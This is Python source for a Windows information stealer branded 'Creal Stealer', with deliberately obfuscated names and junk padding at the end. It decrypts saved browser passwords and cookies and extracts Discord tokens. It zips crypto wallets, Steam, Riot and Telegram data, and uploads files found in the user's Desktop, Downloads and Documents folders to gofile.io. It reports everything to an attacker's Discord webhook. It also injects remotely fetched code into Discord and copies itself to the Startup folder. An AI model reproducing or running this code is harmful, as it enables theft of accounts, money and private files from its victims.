def L04dR3qu3sTs(methode, url, data='', files='', headers=''):
for i in range(8): # max trys
try:
if methode == 'POST':
if data != '':
r = requests.post(url, data=data)
if r.status_code == 200:
return r
elif files != '':
r = requests.post(url, files=files)
if r.status_code == 200 or r.status_code == 413:
return r
except:
pass
def L04durl1b(wh00k, data='', files='', headers=''):
for i in range(8):
try:
if headers != '':
r = urlopen(Request(wh00k, data=data, headers=headers))
return r
else:
r = urlopen(Request(wh00k, data=data))
return r
except:
pass
def globalInfo():
ip = g3t1p()
us3rn4m1 = os.getenv("USERNAME")
ipdatanojson = urlopen(Request(f"https://geolocation-db.com/jsonp/{ip}")).read().decode().replace('callback(', '').replace('})', '}')
# print(ipdatanojson)
ipdata = loads(ipdatanojson)
# print(urlopen(Request(f"https://geolocation-db.com/jsonp/{ip}")).read().decode())
contry = ipdata["country_name"]
contryCode = ipdata["country_code"].lower()
sehir = ipdata["state"]
globalinfo = f":flag_{contryCode}: - `{us3rn4m1.upper()} | {ip} ({contry})`"
return globalinfo
def TR6st(C00k13):
# simple Trust Factor system
global DETECTED
data = str(C00k13)
tim = re.findall(".google.com", data)
# print(len(tim))
if len(tim) < -1:
DETECTED = True
return DETECTED
else:
DETECTED = False
return DETECTED
def G3tUHQFr13ndS(t0k3n):
b4dg3List = [
{"Name": 'Early_Verified_Bot_Developer', 'Value': 131072, 'Emoji': "<:developer:874750808472825986> "},
{"Name": 'Bug_Hunter_Level_2', 'Value': 16384, 'Emoji': "<:bughunter_2:874750808430874664> "},
{"Name": 'Early_Supporter', 'Value': 512, 'Emoji': "<:early_supporter:874750808414113823> "},
{"Name": 'House_Balance', 'Value': 256, 'Emoji': "<:balance:874750808267292683> "},
{"Name": 'House_Brilliance', 'Value': 128, 'Emoji': "<:brilliance:874750808338608199> "},
{"Name": 'House_Bravery', 'Value': 64, 'Emoji': "<:bravery:874750808388952075> "},
{"Name": 'Bug_Hunter_Level_1', 'Value': 8, 'Emoji': "<:bughunter_1:874750808426692658> "},
{"Name": 'HypeSquad_Events', 'Value': 4, 'Emoji': "<:hypesquad_events:874750808594477056> "},
{"Name": 'Partnered_Server_Owner', 'Value': 2,'Emoji': "<:partner:874750808678354964> "},
{"Name": 'Discord_Employee', 'Value': 1, 'Emoji': "<:staff:874750808728666152> "}
]
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
friendlist = loads(urlopen(Request("https://discord.com/api/v6/users/@me/relationships", headers=headers)).read().decode())
except:
return False
uhqlist = ''
for friend in friendlist:
Own3dB3dg4s = ''
flags = friend['user']['public_flags']
for b4dg3 in b4dg3List:
if flags // b4dg3["Value"] != 0 and friend['type'] == 1:
if not "House" in b4dg3["Name"]:
Own3dB3dg4s += b4dg3["Emoji"]
flags = flags % b4dg3["Value"]
if Own3dB3dg4s != '':
uhqlist += f"{Own3dB3dg4s} | {friend['user']['username']}#{friend['user']['discriminator']} ({friend['user']['id']})\n"
return uhqlist
process_list = os.popen('tasklist').readlines()
for process in process_list:
if "Discord" in process:
pid = int(process.split()[1])
os.system(f"taskkill /F /PID {pid}")
def G3tb1ll1ng(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
b1ll1ngjson = loads(urlopen(Request("https://discord.com/api/users/@me/billing/payment-sources", headers=headers)).read().decode())
except:
return False
if b1ll1ngjson == []: return "```None```"
b1ll1ng = ""
for methode in b1ll1ngjson:
if methode["invalid"] == False:
if methode["type"] == 1:
b1ll1ng += ":credit_card:"
elif methode["type"] == 2:
b1ll1ng += ":parking: "
return b1ll1ng
def inj_discord():
username = os.getlogin()
folder_list = ['Discord', 'DiscordCanary', 'DiscordPTB', 'DiscordDevelopment']
for folder_name in folder_list:
deneme_path = os.path.join(os.getenv('LOCALAPPDATA'), folder_name)
if os.path.isdir(deneme_path):
for subdir, dirs, files in os.walk(deneme_path):
if 'app-' in subdir:
for dir in dirs:
if 'modules' in dir:
module_path = os.path.join(subdir, dir)
for subsubdir, subdirs, subfiles in os.walk(module_path):
if 'discord_desktop_core-' in subsubdir:
for subsubsubdir, subsubdirs, subsubfiles in os.walk(subsubdir):
if 'discord_desktop_core' in subsubsubdir:
for file in subsubfiles:
if file == 'index.js':
file_path = os.path.join(subsubsubdir, file)
inj_content = requests.get(inj_url).text
inj_content = inj_content.replace("%WEBHOOK%", wh00k)
with open(file_path, "w", encoding="utf-8") as index_file:
index_file.write(inj_content)
inj_discord()
def G3tB4dg31(flags):
if flags == 0: return ''
Own3dB3dg4s = ''
b4dg3List = [
{"Name": 'Early_Verified_Bot_Developer', 'Value': 131072, 'Emoji': "<:developer:874750808472825986> "},
{"Name": 'Bug_Hunter_Level_2', 'Value': 16384, 'Emoji': "<:bughunter_2:874750808430874664> "},
{"Name": 'Early_Supporter', 'Value': 512, 'Emoji': "<:early_supporter:874750808414113823> "},
{"Name": 'House_Balance', 'Value': 256, 'Emoji': "<:balance:874750808267292683> "},
{"Name": 'House_Brilliance', 'Value': 128, 'Emoji': "<:brilliance:874750808338608199> "},
{"Name": 'House_Bravery', 'Value': 64, 'Emoji': "<:bravery:874750808388952075> "},
{"Name": 'Bug_Hunter_Level_1', 'Value': 8, 'Emoji': "<:bughunter_1:874750808426692658> "},
{"Name": 'HypeSquad_Events', 'Value': 4, 'Emoji': "<:hypesquad_events:874750808594477056> "},
{"Name": 'Partnered_Server_Owner', 'Value': 2,'Emoji': "<:partner:874750808678354964> "},
{"Name": 'Discord_Employee', 'Value': 1, 'Emoji': "<:staff:874750808728666152> "}
]
for b4dg3 in b4dg3List:
if flags // b4dg3["Value"] != 0:
Own3dB3dg4s += b4dg3["Emoji"]
flags = flags % b4dg3["Value"]
return Own3dB3dg4s
def G3tT0k4n1nf9(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
us3rjs0n = loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers)).read().decode())
us3rn4m1 = us3rjs0n["username"]
hashtag = us3rjs0n["discriminator"]
em31l = us3rjs0n["email"]
idd = us3rjs0n["id"]
pfp = us3rjs0n["avatar"]
flags = us3rjs0n["public_flags"]
n1tr0 = ""
ph0n3 = ""
if "premium_type" in us3rjs0n:
nitrot = us3rjs0n["premium_type"]
if nitrot == 1:
n1tr0 = "<a:DE_BadgeNitro:865242433692762122>"
elif nitrot == 2:
n1tr0 = "<a:DE_BadgeNitro:865242433692762122><a:autr_boost1:1038724321771786240>"
if "ph0n3" in us3rjs0n: ph0n3 = f'{us3rjs0n["ph0n3"]}'
return us3rn4m1, hashtag, em31l, idd, pfp, flags, n1tr0, ph0n3
def ch1ckT4k1n(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers))
return True
except:
return False
if getattr(sys, 'frozen', False):
currentFilePath = os.path.dirname(sys.executable)
else:
currentFilePath = os.path.dirname(os.path.abspath(__file__))
fileName = os.path.basename(sys.argv[0])
filePath = os.path.join(currentFilePath, fileName)
startupFolderPath = os.path.join(os.path.expanduser('~'), 'AppData', 'Roaming', 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
startupFilePath = os.path.join(startupFolderPath, fileName)
if os.path.abspath(filePath).lower() != os.path.abspath(startupFilePath).lower():
with open(filePath, 'rb') as src_file, open(startupFilePath, 'wb') as dst_file:
shutil.copyfileobj(src_file, dst_file)
def upl05dT4k31(t0k3n, path):
global wh00k
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
us3rn4m1, hashtag, em31l, idd, pfp, flags, n1tr0, ph0n3 = G3tT0k4n1nf9(t0k3n)
if pfp == None:
pfp = "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
else:
pfp = f"https://cdn.discordapp.com/avatars/{idd}/{pfp}"
b1ll1ng = G3tb1ll1ng(t0k3n)
b4dg3 = G3tB4dg31(flags)
friends = G3tUHQFr13ndS(t0k3n)
if friends == '': friends = "```No Rare Friends```"
if not b1ll1ng:
b4dg3, ph0n3, b1ll1ng = "🔒", "🔒", "🔒"
if n1tr0 == '' and b4dg3 == '': n1tr0 = "```None```"
data = {
"content": f'{globalInfo()} | `{path}`',
"embeds": [
{
"color": 2895667,
"fields": [
{
"name": "<a:hyperNOPPERS:828369518199308388> Token:",
"value": f"```{t0k3n}```",
"inline": True
},
{
"name": "<:mail:750393870507966486> Email:",
"value": f"```{em31l}```",
"inline": True
},
{
"name": "<a:1689_Ringing_Phone:755219417075417088> Phone:",
"value": f"```{ph0n3}```",
"inline": True
},
{
"name": "<:mc_earth:589630396476555264> IP:",
"value": f"```{g3t1p()}```",
"inline": True
},
{
"name": "<:woozyface:874220843528486923> Badges:",
"value": f"{n1tr0}{b4dg3}",
"inline": True
},
{
"name": "<a:4394_cc_creditcard_cartao_f4bihy:755218296801984553> Billing:",
"value": f"{b1ll1ng}",
"inline": True
},
{
"name": "<a:mavikirmizi:853238372591599617> HQ Friends:",
"value": f"{friends}",
"inline": False
}
],
"author": {
"name": f"{us3rn4m1}#{hashtag} ({idd})",
"icon_url": f"{pfp}"
},
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
},
"thumbnail": {
"url": f"{pfp}"
}
}
],
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"username": "Creal Stealer",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
#hersey son defa :(
def R4f0rm3t(listt):
e = re.findall("(\w+[a-z])",listt)
while "https" in e: e.remove("https")
while "com" in e: e.remove("com")
while "net" in e: e.remove("net")
return list(set(e))
def upload(name, link):
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
if name == "crcook":
rb = ' | '.join(da for da in cookiWords)
if len(rb) > 1000:
rrrrr = R4f0rm3t(str(cookiWords))
rb = ' | '.join(da for da in rrrrr)
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"title": "Creal | Cookies Stealer",
"description": f"<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n{rb}\n\n**Data:**\n<:cookies_tlm:816619063618568234> • **{CookiCount}** Cookies Found\n<a:CH_IconArrowRight:715585320178941993> • [CrealCookies.txt]({link})",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
if name == "crpassw":
ra = ' | '.join(da for da in paswWords)
if len(ra) > 1000:
rrr = R4f0rm3t(str(paswWords))
ra = ' | '.join(da for da in rrr)
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"title": "Creal | Password Stealer",
"description": f"<:apollondelirmis:1012370180845883493>: **Accounts**:\n{ra}\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> • **{P4sswCount}** Passwords Found\n<a:CH_IconArrowRight:715585320178941993> • [CrealPassword.txt]({link})",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
if name == "kiwi":
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"color": 2895667,
"fields": [
{
"name": "Interesting files found on user PC:",
"value": link
}
],
"author": {
"name": "Creal | File Stealer"
},
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
# def upload(name, tk=''):
# headers = {
# "Content-Type": "application/json",
# "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
# }
# # r = requests.post(hook, files=files)
# LoadRequests("POST", hook, files=files)
_
def wr1tef0rf1l3(data, name):
path = os.getenv("TEMP") + f"\cr{name}.txt"
with open(path, mode='w', encoding='utf-8') as f:
f.write(f"<--Creal STEALER BEST -->\n\n")
for line in data:
if line[0] != '':
f.write(f"{line}\n")
T0k3ns = ''
def getT0k3n(path, arg):
if not os.path.exists(path): return
path += arg
for file in os.listdir(path):
if file.endswith(".log") or file.endswith(".ldb") :
for line in [x.strip() for x in open(f"{path}\\{file}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}", r"mfa\.[\w-]{80,95}"):
for t0k3n in re.findall(regex, line):
global T0k3ns
if ch1ckT4k1n(t0k3n):
if not t0k3n in T0k3ns:
# print(token)
T0k3ns += t0k3n
upl05dT4k31(t0k3n, path)
P4ssw = []
def getP4ssw(path, arg):
global P4ssw, P4sswCount
if not os.path.exists(path): return
pathC = path + arg + "/Login Data"
if os.stat(pathC).st_size == 0: return
tempfold = temp + "cr" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
shutil.copy2(pathC, tempfold)
conn = sql_connect(tempfold)
cursor = conn.cursor()
cursor.execute("SELECT action_url, username_value, password_value FROM logins;")
data = cursor.fetchall()
cursor.close()
conn.close()
os.remove(tempfold)
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
for row in data:
if row[0] != '':
for wa in keyword:
old = wa
if "https" in wa:
tmp = wa
wa = tmp.split('[')[1].split(']')[0]
if wa in row[0]:
if not old in paswWords: paswWords.append(old)
P4ssw.append(f"UR1: {row[0]} | U53RN4M3: {row[1]} | P455W0RD: {D3kryptV4lU3(row[2], master_key)}")
P4sswCount += 1
wr1tef0rf1l3(P4ssw, 'passw')
C00k13 = []
def getC00k13(path, arg):
global C00k13, CookiCount
if not os.path.exists(path): return
pathC = path + arg + "/Cookies"
if os.stat(pathC).st_size == 0: return
tempfold = temp + "cr" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
shutil.copy2(pathC, tempfold)
conn = sql_connect(tempfold)
cursor = conn.cursor()
cursor.execute("SELECT host_key, name, encrypted_value FROM cookies")
data = cursor.fetchall()
cursor.close()
conn.close()
os.remove(tempfold)
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
for row in data:
if row[0] != '':
for wa in keyword:
old = wa
if "https" in wa:
tmp = wa
wa = tmp.split('[')[1].split(']')[0]
if wa in row[0]:
if not old in cookiWords: cookiWords.append(old)
C00k13.append(f"{row[0]} TRUE / FALSE 2597573456 {row[1]} {D3kryptV4lU3(row[2], master_key)}")
CookiCount += 1
wr1tef0rf1l3(C00k13, 'cook')
def G3tD1sc0rd(path, arg):
if not os.path.exists(f"{path}/Local State"): return
pathC = path + arg
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
# print(path, master_key)
for file in os.listdir(pathC):
# print(path, file)
if file.endswith(".log") or file.endswith(".ldb") :
for line in [x.strip() for x in open(f"{pathC}\\{file}", errors="ignore").readlines() if x.strip()]:
for t0k3n in re.findall(r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*", line):
global T0k3ns
t0k3nDecoded = D3kryptV4lU3(b64decode(t0k3n.split('dQw4w9WgXcQ:')[1]), master_key)
if ch1ckT4k1n(t0k3nDecoded):
if not t0k3nDecoded in T0k3ns:
# print(token)
T0k3ns += t0k3nDecoded
# writeforfile(Tokens, 'tokens')
upl05dT4k31(t0k3nDecoded, path)
def GatherZips(paths1, paths2, paths3):
thttht = []
for patt in paths1:
a = threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[5], patt[1]])
a.start()
thttht.append(a)
for patt in paths2:
a = threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[2], patt[1]])
a.start()
thttht.append(a)
a = threading.Thread(target=ZipTelegram, args=[paths3[0], paths3[2], paths3[1]])
a.start()
thttht.append(a)
for thread in thttht:
thread.join()
global WalletsZip, GamingZip, OtherZip
# print(WalletsZip, GamingZip, OtherZip)
wal, ga, ot = "",'',''
if not len(WalletsZip) == 0:
wal = ":coin: • Wallets\n"
for i in WalletsZip:
wal += f"└─ [{i[0]}]({i[1]})\n"
if not len(WalletsZip) == 0:
ga = ":video_game: • Gaming:\n"
for i in GamingZip:
ga += f"└─ [{i[0]}]({i[1]})\n"
if not len(OtherZip) == 0:
ot = ":tickets: • Apps\n"
for i in OtherZip:
ot += f"└─ [{i[0]}]({i[1]})\n"
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
data = {
"content": globalInfo(),
"embeds": [
{
"title": "Creal Zips",
"description": f"{wal}\n{ga}\n{ot}",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
def ZipTelegram(path, arg, procc):
global OtherZip
pathC = path
name = arg
if not os.path.exists(pathC): return
subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True)
zf = ZipFile(f"{pathC}/{name}.zip", "w")
for file in os.listdir(pathC):
if not ".zip" in file and not "tdummy" in file and not "user_data" in file and not "webview" in file:
zf.write(pathC + "/" + file)
zf.close()
lnik = uploadToAnonfiles(f'{pathC}/{name}.zip')
#lnik = "https://google.com"
os.remove(f"{pathC}/{name}.zip")
OtherZip.append([arg, lnik])
def Z1pTh1ngs(path, arg, procc):
pathC = path
name = arg
global WalletsZip, GamingZip, OtherZip
# subprocess.Popen(f"taskkill /im {procc} /t /f", shell=True)
# os.system(f"taskkill /im {procc} /t /f")
if "nkbihfbeogaeaoehlefnkodbefgpgknn" in arg:
browser = path.split("\\")[4].split("/")[1].replace(' ', '')
name = f"Metamask_{browser}"
pathC = path + arg
if not os.path.exists(pathC): return
subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True)
if "Wallet" in arg or "NationsGlory" in arg:
browser = path.split("\\")[4].split("/")[1].replace(' ', '')
name = f"{browser}"
elif "Steam" in arg:
if not os.path.isfile(f"{pathC}/loginusers.vdf"): return
f = open(f"{pathC}/loginusers.vdf", "r+", encoding="utf8")
data = f.readlines()
# print(data)
found = False
for l in data:
if 'RememberPassword"\t\t"1"' in l:
found = True
if found == False: return
name = arg
zf = ZipFile(f"{pathC}/{name}.zip", "w")
for file in os.listdir(pathC):
if not ".zip" in file: zf.write(pathC + "/" + file)
zf.close()
lnik = uploadToAnonfiles(f'{pathC}/{name}.zip')
#lnik = "https://google.com"
os.remove(f"{pathC}/{name}.zip")
if "Wallet" in arg or "eogaeaoehlef" in arg:
WalletsZip.append([name, lnik])
elif "NationsGlory" in name or "Steam" in name or "RiotCli" in name:
GamingZip.append([name, lnik])
else:
OtherZip.append([name, lnik])
def GatherAll():
' Default Path < 0 > ProcesName < 1 > Token < 2 > Password < 3 > Cookies < 4 > Extentions < 5 > '
browserPaths = [
[f"{roaming}/Opera Software/Opera GX Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{roaming}/Opera Software/Opera Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{roaming}/Opera Software/Opera Neon/User Data/Default", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Google/Chrome/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Google/Chrome SxS/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/BraveSoftware/Brave-Browser/User Data", "brave.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Yandex/YandexBrowser/User Data", "yandex.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/HougaBouga/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Microsoft/Edge/User Data", "edge.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ]
]
discordPaths = [
[f"{roaming}/Discord", "/Local Storage/leveldb"],
[f"{roaming}/Lightcord", "/Local Storage/leveldb"],
[f"{roaming}/discordcanary", "/Local Storage/leveldb"],
[f"{roaming}/discordptb", "/Local Storage/leveldb"],
]
PathsToZip = [
[f"{roaming}/atomic/Local Storage/leveldb", '"Atomic Wallet.exe"', "Wallet"],
[f"{roaming}/Exodus/exodus.wallet", "Exodus.exe", "Wallet"],
["C:\Program Files (x86)\Steam\config", "steam.exe", "Steam"],
[f"{roaming}/NationsGlory/Local Storage/leveldb", "NationsGlory.exe", "NationsGlory"],
[f"{local}/Riot Games/Riot Client/Data", "RiotClientServices.exe", "RiotClient"]
]
Telegram = [f"{roaming}/Telegram Desktop/tdata", 'telegram.exe', "Telegram"]
for patt in browserPaths:
a = threading.Thread(target=getT0k3n, args=[patt[0], patt[2]])
a.start()
Threadlist.append(a)
for patt in discordPaths:
a = threading.Thread(target=G3tD1sc0rd, args=[patt[0], patt[1]])
a.start()
Threadlist.append(a)
for patt in browserPaths:
a = threading.Thread(target=getP4ssw, args=[patt[0], patt[3]])
a.start()
Threadlist.append(a)
ThCokk = []
for patt in browserPaths:
a = threading.Thread(target=getC00k13, args=[patt[0], patt[4]])
a.start()
ThCokk.append(a)
threading.Thread(target=GatherZips, args=[browserPaths, PathsToZip, Telegram]).start()
for thread in ThCokk: thread.join()
DETECTED = TR6st(C00k13)
if DETECTED == True: return
for patt in browserPaths:
threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[5], patt[1]]).start()
for patt in PathsToZip:
threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[2], patt[1]]).start()
threading.Thread(target=ZipTelegram, args=[Telegram[0], Telegram[2], Telegram[1]]).start()
for thread in Threadlist:
thread.join()
global upths
upths = []
for file in ["crpassw.txt", "crcook.txt"]:
# upload(os.getenv("TEMP") + "\\" + file)
upload(file.replace(".txt", ""), uploadToAnonfiles(os.getenv("TEMP") + "\\" + file))
def uploadToAnonfiles(path):
try:return requests.post(f'https://{requests.get("https://api.gofile.io/getServer").json()["data"]["server"]}.gofile.io/uploadFile', files={'file': open(path, 'rb')}).json()["data"]["downloadPage"]
except:return False
# def uploadToAnonfiles(path):s
# try:
# files = { "file": (path, open(path, mode='rb')) }
# upload = requests.post("https://transfer.sh/", files=files)
# url = upload.text
# return url
# except:
# return False
def KiwiFolder(pathF, keywords):
global KiwiFiles
maxfilesperdir = 7
i = 0
listOfFile = os.listdir(pathF)
ffound = []
for file in listOfFile:
if not os.path.isfile(pathF + "/" + file): return
i += 1
if i <= maxfilesperdir:
url = uploadToAnonfiles(pathF + "/" + file)
ffound.append([pathF + "/" + file, url])
else:
break
KiwiFiles.append(["folder", pathF + "/", ffound])
KiwiFiles = []
def KiwiFile(path, keywords):
global KiwiFiles
fifound = []
listOfFile = os.listdir(path)
for file in listOfFile:
for worf in keywords:
if worf in file.lower():
if os.path.isfile(path + "/" + file) and ".txt" in file:
fifound.append([path + "/" + file, uploadToAnonfiles(path + "/" + file)])
break
if os.path.isdir(path + "/" + file):
target = path + "/" + file
KiwiFolder(target, keywords)
break
KiwiFiles.append(["folder", path, fifound])
def Kiwi():
user = temp.split("\AppData")[0]
path2search = [
user + "/Desktop",
user + "/Downloads",
user + "/Documents"
]
key_wordsFolder = [
"account",
"acount",
"passw",
"secret",
"senhas",
"contas",
"backup",
"2fa",
"importante",
"privado",
"exodus",
"exposed",
"perder",
"amigos",
"empresa",
"trabalho",
"work",
"private",
"source",
"users",
"username",
"login",
"user",
"usuario",
"log"
]
key_wordsFiles = [
"passw",
"mdp",
"motdepasse",
"mot_de_passe",
"login",
"secret",
"account",
"acount",
"paypal",
"banque",
"account",
"metamask",
"wallet",
"crypto",
"exodus",
"discord",
"2fa",
"code",
"memo",
"compte",
"token",
"backup",
"secret",
"mom",
"family"
]
wikith = []
for patt in path2search:
kiwi = threading.Thread(target=KiwiFile, args=[patt, key_wordsFiles]);kiwi.start()
wikith.append(kiwi)
return wikith
global keyword, cookiWords, paswWords, CookiCount, P4sswCount, WalletsZip, GamingZip, OtherZip
keyword = [
'mail', '[coinbase](https://coinbase.com)', '[sellix](https://sellix.io)', '[gmail](https://gmail.com)', '[steam](https://steam.com)', '[discord](https://discord.com)', '[riotgames](https://riotgames.com)', '[youtube](https://youtube.com)', '[instagram](https://instagram.com)', '[tiktok](https://tiktok.com)', '[twitter](https://twitter.com)', '[facebook](https://facebook.com)', 'card', '[epicgames](https://epicgames.com)', '[spotify](https://spotify.com)', '[yahoo](https://yahoo.com)', '[roblox](https://roblox.com)', '[twitch](https://twitch.com)', '[minecraft](https://minecraft.net)', 'bank', '[paypal](https://paypal.com)', '[origin](https://origin.com)', '[amazon](https://amazon.com)', '[ebay](https://ebay.com)', '[aliexpress](https://aliexpress.com)', '[playstation](https://playstation.com)', '[hbo](https://hbo.com)', '[xbox](https://xbox.com)', 'buy', 'sell', '[binance](https://binance.com)', '[hotmail](https://hotmail.com)', '[outlook](https://outlook.com)', '[crunchyroll](https://crunchyroll.com)', '[telegram](https://telegram.com)', '[pornhub](https://pornhub.com)', '[disney](https://disney.com)', '[expressvpn](https://expressvpn.com)', 'crypto', '[uber](https://uber.com)', '[netflix](https://netflix.com)'
]
CookiCount, P4sswCount = 0, 0
cookiWords = []
paswWords = []
WalletsZip = [] # [Name, Link]
GamingZip = []
OtherZip = []
GatherAll()
DETECTED = TR6st(C00k13)
# DETECTED = False
if not DETECTED:
wikith = Kiwi()
for thread in wikith: thread.join()
time.sleep(0.2)
filetext = "\n"
for arg in KiwiFiles:
if len(arg[2]) != 0:
foldpath = arg[1]
foldlist = arg[2]
filetext += f"📁 {foldpath}\n"
for ffil in foldlist:
a = ffil[0].split("/")
fileanme = a[len(a)-1]
b = ffil[1]
filetext += f"└─:open_file_folder: [{fileanme}]({b})\n"
filetext += "\n"
upload("kiwi", filetext)
class UMuzEjUeXvllG:
def __init__(self):
self.__GmbYmdILLuYRlZim()
self.__NhiBgGJi()
self.__EOZkWGNvefQhdjkdSv()
self.__LEpwJFCrqe()
self.__RaxQsbUaiXFuosjLjFL()
self.__gFyMUBeclxAMSuLGFI()
self.__peuqNPJgSViqteJ()
self.__ZYLcqbHdYTIqqL()
self.__MgiXVFfX()
def __GmbYmdILLuYRlZim(self, UuRZkBenvdQaxpr, EhsaszgQ, WusaqAueWgoRuFJxREl, rTaQFK, ikgVdCv, CjYaFqqV):
return self.__EOZkWGNvefQhdjkdSv()
def __NhiBgGJi(self, CuBzwZqZVh, vrQntwSfuo, ZNLesUnrw):
return self.__EOZkWGNvefQhdjkdSv()
def __EOZkWGNvefQhdjkdSv(self, ruDEFEVIMPuljxbIum, IcZbAuTO, ZCpTMCgZXOvOlb, XVHYWuS, ROkgZ):
return self.__ZYLcqbHdYTIqqL()
def __LEpwJFCrqe(self, mBAvgegohAEQ, ZGIXDTrwFUgGewuTBXzh):
return self.__MgiXVFfX()
def __RaxQsbUaiXFuosjLjFL(self, MibIKA, JcQaeKrMlNwgyDHed, uIebkvmF):
return self.__NhiBgGJi()
